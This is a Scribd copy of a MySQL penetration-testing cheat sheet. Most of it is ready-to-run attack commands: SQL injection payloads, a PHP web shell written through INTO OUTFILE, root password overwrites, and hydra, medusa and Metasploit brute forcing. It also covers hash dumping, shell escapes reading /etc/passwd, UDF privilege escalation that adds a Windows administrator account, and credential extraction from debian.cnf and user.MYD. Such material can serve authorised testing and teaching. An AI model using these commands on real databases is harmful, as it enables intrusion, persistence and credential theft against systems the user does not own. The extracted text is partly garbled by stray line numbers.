Scribd
Upload
128 views6 pages

MYSQL Pentesting Best Practices

This document provides best practices for pentesting MySQL databases. It discusses common MySQL ports and commands, enumeration tactics like user and database discovery, password cracking, privilege escalation, and extracting credentials from database backups and log files.

Uploaded by

kocherla Manohar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
128 views6 pages

MYSQL Pentesting Best Practices

This document provides best practices for pentesting MySQL databases. It discusses common MySQL ports and commands, enumeration tactics like user and database discovery, password cracking, privilege escalation, and extracting credentials from database backups and log files.

Uploaded by

kocherla Manohar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 6

MYSQL Pentesting Best Practices

8–10 minutes

MYSQL
MYSQL default uses ports 3306

What is MYSQL?
MySQL is a freely available open source Relational Database Management System
(RDBMS) that uses Structured Query Language (SQL).

1 PORT STATE SERVICE VERSION


2 3306/tcp open mysql

MYSQL Connection

#LOCAL
mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

#REMOTE
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

Basic & interesting MySQL commands


1 show databases;
2 use <database>;
3 show tables;
4 describe <table_name>;
5
6 select grantee, table_schema, privilege_type FROM schema_privileges;
7 #Exact privileges
8 select user,file_priv from mysql.user where user='root'; #File privileges
9 select version(); #version
10 select @@version(); #version
11 select user(); #User
12 select database(); #database name
13
14 #Try to execute code
15 select do_system('id');
\! sh

16 #Basic MySQLi
17 Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from
18 information_schema.tables
19 Union Select 1,2,3,4,column_name from information_schema.columns where
20 table_name="<TABLE NAME>"
21
22 #Read & Write
23 select load_file('/var/lib/mysql-files/key.txt'); #Read file
24 select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE
25 'C:/xampp/htdocs/back.php'
26
27 #Try to change MySQL root password
28 UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
29 UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE
User='root';
FLUSH PRIVILEGES;
quit;

1 mysql -u username -p < manycommands.sql #A file with all the commands you
2 want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

MYSQL Pentesting
Shodan search query :
port:3306

Enumeration
1 # !!!! You should edit --script-args for your MYSQL Server !!!
2
3 # Audits MySQL database server security configuration
4 nmap -p 3306 --script mysql-audit --script-args "mysql-
5 audit.username='root', \
6 mysql-audit.password='foobar',mysql-audit.filename='nselib/data/mysql-
7 cis.audit'" 192.168.x.x
8
9 # Bruteforce accounts and password against a MySQL Server
10 nmap --script=mysql-brute --script-args
11 userdb=users.txt,passdb=passwords.txt -p 3306 192.168.x.x
12
13 # Attempts to list all databases on a MySQL server. (creds required)
14 nmap -sV --script=mysql-databases -p 3306 192.168.x.x
15
16 #Dumps the password hashes from an MySQL server in a format suitable
17 (creds required)
18 nmap --script mysql-dump-hashes --script-
19 args='username=root,password=secret' -p 3306 192.168.x.x
20
21 # Checks for MySQL servers with an empty password for root or anonymous.
22 nmap -sV --script=mysql-empty-password -p 3306 192.168.x.x
23
24 # Performs valid-user enumeration against MySQL server using a bug
25 nmap --script=mysql-enum -p 3306 192.168.x.x
# Connects to a MySQL server and prints information such as the protocol
and version numbers, thread ID, status, capabilities, and the password
salt.
nmap -sV -sC -p 3306 192.168.x.x

26 # Runs a query against a MySQL database and returns the results as a


27 table. (creds required)
28 nmap --script mysql-query --script-
29 args='query="<query>"[,username=<username>,password=<password>]' -p 3306
30 192.168.x.x
31
32 # Attempts to list all users on a MySQL server.
33 nmap -sV --script=mysql-users -p 3306 192.168.x.x
34
35 # Attempts to show all variables on a MySQL server.
nmap -sV --script=mysql-variables -p 3306 192.168.x.x

# Attempts to bypass authentication in MySQL and MariaDB servers by


exploiting CVE2012-2122. If its vulnerable, it will also attempt to dump
the MySQL usernames and password hashes.
nmap --script mysql-vuln-cve2012-2122 -p3306 192.168.x.x

Some of the enumeration actions require valid credentials

1 msf> use auxiliary/scanner/mysql/mysql_version


2 msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
3 msf> use auxiliary/scanner/mysql/mysql_hashdump #Need Credential
4 msf> use auxiliary/admin/mysql/mysql_enum #Need Credential
5 msf> use auxiliary/scanner/mysql/mysql_schemadump #Need Credential
6 msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows,
Need Credential

Brute Forcing
1 hydra -L usernames.txt -P pass.txt <IP> mysql
2 msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
3 medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa
on first success attempt> -t <threads> -M mysql

Write any binary data


1 CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
2 CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

MySQL arbitrary read file by client


Actually, when you try to load data local into a table the content of a file the MySQL or
MariaDB server asks the client to read it and send the content. Then, if you can tamper a
mysql client to connect to your own MyQSL server, you can read arbitrary files.
Please notice that this is the behaviour using:

1 load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY
'\n';

Notice the “local” word, because without the “local” you can get:

mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY
1 '\n';
2 ERROR 1290 (HY000): The MySQL server is running with the --secure-file-
priv option so it cannot execute this statement

Initial PoC: https://github.com/allyshka/Rogue-MySql-Server

In this paper you can see a complete description of the attack and even how to extend it to
RCE: https://paper.seebug.org/1113/

Here you can find an overview of the attack: http://russiansecurity.expert/2016/04/20/mysql-


connect-file-read/

Mysql User

It will be very interesting if mysql is running as root:

1 cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"

Privilege escalation
Current Level of access
mysql>select user();
1 mysql>select
2 user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,d
rop_priv from user where user='OUTPUT OF select user()';

Access Passwords
1 mysql> use mysql
2 mysql> select user,password from user;

Create a new user and grant him privileges

1 mysql>create user test identified by 'test';


2 mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql
identified by 'mysql' WITH GRANT OPTION;
Break into a shell
1 mysql> \! cat /etc/passwd
2 mysql> \! bash

Privilege Escalation via library

You can find compiled versions of this libraries in sqlmap: locate lib_mysqludf_sys.so and
locate lib_mysqludf_sys.dllInstead of locate you can also use whereis to search for this
libraries inside the host.

Linux

1 use mysql;
2 create table npn(line blob);
3 insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
4 select * from npn into dumpfile
5 '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';
6 create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
select sys_exec('id > /tmp/out.txt');

Windows

USE mysql;
1 CREATE TABLE npn(line blob);
2 INSERT INTO npn values(load_files('C://temp//lib_mysqludf_sys.dll'));
3 SELECT * FROM mysql.npn INTO DUMPFILE
4 'c://windows//system32//lib_mysqludf_sys_32.dll';
5 CREATE FUNCTION sys_exec RETURNS integer SONAME
6 'lib_mysqludf_sys_32.dll';
7 SELECT sys_exec("net user npn npn12345678 /add");
8 SELECT sys_exec("net localgroup Administrators npn /add");
9 Extracting MySQL credentials from the database
10 SELECT User,Host,Password FROM mysql.user;
11 SELECT User,Host,authentication_string FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT
User,Host,authentication_string FROM mysql.user;"

Inside /etc/mysql/debian.cnf you can find the plain-text password of the user debian-
sys-maint

1 cat /etc/mysql/debian.cnf

You can use these credentials to login in the mysql database.

Inside the file: /var/lib/mysql/mysql/user.MYD you can find all the hashes of the MySQL
users (the ones that you can extract from mysql.user inside the database).

You can extract them doing:


1 grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v
"mysql_native_password"

Enabling logging

You can enable logging of mysql queries inside /etc/mysql/my.cnf uncommenting the
following lines:

Useful Files

windows

 config.ini
 my.ini
o windows\my.ini
o winnt\my.ini
 /mysql/data/

unix

 my.cnf
o /etc/my.cnf
o /etc/mysql/my.cnf
o /var/lib/mysql/my.cnf
o ~/.my.cnf
o /etc/my.cnf

Command History

 ~/.mysql.history

Log Files

 connections.log
 update.log
 common.log

You might also like